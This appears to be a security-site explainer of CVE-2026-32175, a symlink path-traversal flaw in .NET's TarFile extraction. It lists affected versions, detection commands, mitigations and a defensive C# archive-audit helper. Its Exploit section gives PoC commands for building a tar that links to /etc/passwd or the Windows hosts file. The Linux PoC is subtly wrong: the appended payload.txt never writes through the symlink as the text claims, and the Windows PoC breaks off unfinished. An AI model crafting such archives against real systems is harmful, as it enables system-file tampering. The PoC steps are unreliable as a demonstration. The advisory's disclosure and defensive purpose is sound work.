How CVE-2026-32175 Works
A tampering vulnerability exists in the .NET `System.Formats.Tar` library when extracting tar archives using the `TarFile.ExtractToDirectory` and `ExtractRelativeToDirectoryAsync` methods. The flaw is a symbolic link (symlink) path traversal vulnerability that enables an attacker to perform arbitrary file writes outside the intended extraction directory.
The vulnerability resides in the path handling logic within src/libraries/System.Formats.Tar/src/System/Formats/Tar/TarEntry.cs. An attacker can craft a malicious tar archive containing a symlink entry whose target is a rooted path (e.g., an absolute path on Windows). When the vulnerable `TarFile.ExtractToDirectory` method extracts this archive, it does not properly validate the symlink target, allowing the symlink to be created outside the destination directory.
Once the attacker-controlled symlink is placed on the filesystem, it can be used to redirect subsequent file writes. A later entry in the tar archive can write through this symlink, effectively writing arbitrary files to any location on the same drive that the extracting process has permissions to access. This two-step process—first creating a malicious symlink, then writing through it—bypasses the intended directory boundary.
The attack does not require special privileges beyond the ability to provide a crafted tar file to an application that uses the vulnerable API. However, the impact is limited by the permissions of the process performing the extraction. According to the maintainers, an attacker would have limited control over the destination of the files and directories. The vulnerability affects all platforms and architectures where the affected .NET versions are used.
The fix addresses the issue by ensuring that .NET Core properly handles files and validates symlink targets during extraction, preventing the creation of symlinks that point outside the intended extraction directory. Microsoft has released security updates for .NET 8.0, 9.0, and 10.0 to remediate this vulnerability.
DailyCVE Form:
Platform: .NET Core / .NET
Version: 8.0 (<8.0.27), 9.0 (<9.0.16), 10.0 (<10.0.8)
Vulnerability: Path Traversal (Symlink)
Severity: Medium (CVSS 4.3)
Date: May 18, 2026
Prediction: June 9, 2026
What Undercode Say: Analytics
The vulnerability allows writing arbitrary files outside the extraction directory by first creating a symlink to a rooted path.
Detection Commands:
Check your .NET version to determine if you are affected:
```
dotnet --info
```
Check project dependencies for vulnerable package versions:
```
dotnet list package --vulnerable
```
Vulnerable Code Pattern:
```
using System.Formats.Tar;

// Vulnerable on an unpatched runtime: extracts the tar without validating symlink targets
TarFile.ExtractToDirectory("malicious.tar", "./extract", overwriteFiles: false);
```
Patched Code Pattern:
```
using System.Formats.Tar;

// Safe: the same call, after updating to a patched version
TarFile.ExtractToDirectory("malicious.tar", "./extract", overwriteFiles: false);
```
Exploit
An attacker can create a malicious tar archive with the following structure:
1. A symlink entry pointing to a rooted path outside the extraction directory (e.g., `C:\Windows\System32\config\` on Windows).
2. A regular file entry that writes through the symlink to an arbitrary location.
PoC Tar Creation (Linux/macOS):
```
# Create a symlink pointing outside the extraction directory
ln -s /etc/passwd malicious_symlink
# Create a tar archive containing the symlink
tar -cf exploit.tar malicious_symlink
# Add a file that will be written through the symlink
echo "malicious content" > payload.txt
tar -rf exploit.tar payload.txt
```
PoC Tar Creation (Windows – using PowerShell):
```
# Create a symlink (requires elevated privileges or developer mode)
New-Item -ItemType SymbolicLink -Path "malicious_symlink" -Target "C:\Windows\System32\drivers\etc\hosts"
# Create tar archive (using 7zip or similar)
# Then add a file that writes through the symlink
```
When a vulnerable application extracts this archive, the symlink is created outside the intended directory, and the subsequent file write operation can overwrite critical system files.
Protection
- Update .NET Runtime/SDK: Install the latest version of .NET 8.0 (8.0.27+), .NET 9.0 (9.0.16+), or .NET 10.0 (10.0.8+).
- Update NuGet Packages: If your application references `System.Formats.Tar` directly, update the package reference to the patched version.
- Restart Applications: After installing the updated runtime or SDK, restart your apps for the update to take effect.
- Recompile Self-Contained Applications: If you have deployed self-contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
- Input Validation: If immediate updating is not possible, validate all extracted paths to ensure they remain within the intended directory.
- Least Privilege: Run extraction processes with the least privileges necessary to limit the impact of a potential exploit.
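One way to apply the Input Validation item on a runtime that cannot be updated yet is to audit the archive before extracting it. This is an added example, not code from the .NET project or the original post; `TarPreflight` and `Audit` are hypothetical names, and it assumes the destination is a fresh directory that contains no links of its own.

```csharp
using System;
using System.Collections.Generic;
using System.Formats.Tar;
using System.IO;

// Hypothetical helper (not a .NET API): audits a tar archive before extraction.
static class TarPreflight
{
    // Returns one finding per suspicious entry; an empty list means nothing escapes destDir.
    public static List<string> Audit(string tarPath, string destDir)
    {
        string root = Path.TrimEndingDirectorySeparator(Path.GetFullPath(destDir))
                      + Path.DirectorySeparatorChar;
        var findings = new List<string>();
        // Case-insensitive on every OS: errs toward reporting more, never less.
        var linkPaths = new HashSet<string>(StringComparer.OrdinalIgnoreCase);

        using FileStream fs = File.OpenRead(tarPath);
        using var reader = new TarReader(fs);
        while (reader.GetNextEntry() is TarEntry entry)
        {
            string full = Path.TrimEndingDirectorySeparator(Path.GetFullPath(entry.Name, root));
            if (Path.IsPathRooted(entry.Name) || !IsInside(root, full))
                findings.Add($"name escapes destination: {entry.Name}");

            // Step two of the attack: a later entry whose path runs through an earlier link.
            for (string? dir = Path.GetDirectoryName(full); dir is not null; dir = Path.GetDirectoryName(dir))
                if (linkPaths.Contains(dir))
                    findings.Add($"writes through archived link: {entry.Name}");

            if (entry.EntryType is not (TarEntryType.SymbolicLink or TarEntryType.HardLink))
                continue;
            linkPaths.Add(full);

            // Step one: a rooted target, or a relative one that resolves outside root.
            // Symlink targets resolve from the link's directory, hard links from the root.
            string baseDir = entry.EntryType == TarEntryType.SymbolicLink
                ? Path.GetDirectoryName(full) ?? root : root;
            if (Path.IsPathRooted(entry.LinkName) || !IsInside(root, Path.GetFullPath(entry.LinkName, baseDir)))
                findings.Add($"link target escapes destination: {entry.Name} -> {entry.LinkName}");
        }
        return findings;
    }

    // Ordinal prefix check on normalized full paths; the trailing separator stops "/dest" matching "/destevil".
    static bool IsInside(string root, string fullPath) =>
        (fullPath + Path.DirectorySeparatorChar).StartsWith(root, StringComparison.Ordinal);
}
```

Call `Audit` before `TarFile.ExtractToDirectory` and reject the archive when the returned list is not empty.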
Impact
- Arbitrary File Write: An attacker can write files to any location on the system that the extracting process has permissions to access.
- System Compromise: If the extraction process runs with elevated privileges (e.g., as Administrator or root), an attacker could overwrite critical system files, leading to system compromise or privilege escalation.
- Data Tampering: The vulnerability can be used to tamper with application configuration files, leading to further attacks.
- Limited Control: According to Microsoft, an attacker would have limited control over the destination of the files and directories, reducing the overall severity.
- Supply Chain Risk: Applications that process untrusted tar archives (e.g., automated build systems, deployment pipelines, web applications) are particularly at risk.
Sources:
Reported By: github.com

